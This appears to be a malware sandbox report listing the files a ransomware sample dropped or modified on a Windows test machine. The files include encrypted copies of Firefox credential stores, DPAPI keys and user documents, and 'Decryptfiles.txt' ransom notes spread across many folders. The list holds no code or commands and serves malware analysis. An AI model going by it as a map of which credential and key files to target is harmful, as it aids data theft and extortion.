C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
data
dropped
malicious
C:\Users\user\Videos\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\_curlrc.QhjT
Dyalog APL version -3.87
dropped
malicious
C:\Users\user\ntuser.dat.LOG1.qsaN
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG1.zFIM
data
dropped
malicious
C:\Users\user\ntuser.dat.LOG2.yVIk
data
modified
malicious
C:\Users\user\ntuser.dat.LOG2.yrbT
data
dropped
malicious
C:\Users\user\ntuser.ini
data
dropped
malicious
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x26d1c33e, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\Public\Libraries\RecordedTV.library-ms.BDVt (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.xNOk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.HWrg (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.iPBU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.Mezk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.rAxY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.lQYq (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.oCne (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.JDcj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.jmtu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.PdQk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.yGUV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.fviB (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b.BqDM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.lPQT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.fmAg (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.dtbr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.JjBl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.gtXP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.qpCH (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjtG (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png.krjt (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.yVvX (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.ONrF (copy)
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg.WIXo (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png.oKLT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3.plQN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png.BRUx (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx.VXkw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.wdfC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx.hAlF (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg.eprR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx.XUBO (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg.oygr (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3.gBKv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf.GOHi (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx.iHFZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3.dgJj (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx.cbGq (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx.eHcO (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg.PcmU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx.TmlY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png.brqN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3.ObNa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg.OToE (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx.tPvz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx.VuIG (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx.TYgz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg.HgaQ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3.qtgv (copy)
byte-swapped Berkeley vfont data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx.qDQu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf.BOKH (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.bpoX (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png.caCH (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png.KiBF (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3.mXhC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.iSWK (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx.bWXN (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png.lpiM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg.ayzY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx.LzAp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.QjXA (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf.WqNa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png.Wkpw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx.VOgz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg.iEbY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3.DomY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf.eJLy (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx.NJLe (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3.gWZR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.GuUT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.SUVD (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.jqFt (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.apWv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.qZrs (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.tiVb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jaxC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt.PFak (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json.IOon (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt.KBUz (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4.DHML (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json.IABP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db.lDFx (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini.Klgc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json.QTxO (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite.NIxU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm.LVWf (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite.faxb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4.SEKQ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4.rPjI (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4.LCHo (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4.xgqC (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4.pEyQ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4.ZKhS (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4.HkoK (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4.AJya (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin.sYuZ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update.IVvW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events.VmMX (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa.BZNT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32.XnMa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65.sEqP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208.IVfa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba.jsbL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4.Ehqb (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c.chVM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef.qHVn (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748.gPKv (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993.Lbdi (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76.KTkf (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7.Ohus (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7.lDGy (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a.iWVk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855.Mikq (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0.nmQe (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4.nMDK (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5.QmZW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16.zNJW (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d.efHJ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066.JqUn (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json.gUXa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json.gSRq (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json.WeZA (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json.bZyd (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite.HCyL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db.fphL (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite.pWQj (copy)
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt.lWUP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm.RDpm (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite.MCJU (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js.JDCT (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite.gzih (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf.kuBI (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d.yagD (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d.zkga (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2.LvSr (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75.Obuv (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844.YKcf (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.qhMV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27.CekY (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4.mlQR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json.OUln (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4.jeiX (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.bEoR (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4.xMDl (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json.jMtw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite.DJrM (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite.rOuh (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2.xXYP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.huxQ (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.xBHk (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.iHWS (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.wVlF (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.LPun (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.kqQA (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm.QYzp (copy)
big endian ispell hash file (?),
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite.OGdw (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm.pTds (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.qySf (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm.Ztqc (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite.zbTA (copy)
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json.pzAy (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json.Wmat (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm.XQpa (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite.Jxjh (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json.vBOp (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini.azAV (copy)
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini.FdKp (copy)
data
dropped
C:\Users\user\Desktop\AQRFEVRTGL.png.sbdO (copy)
data
dropped
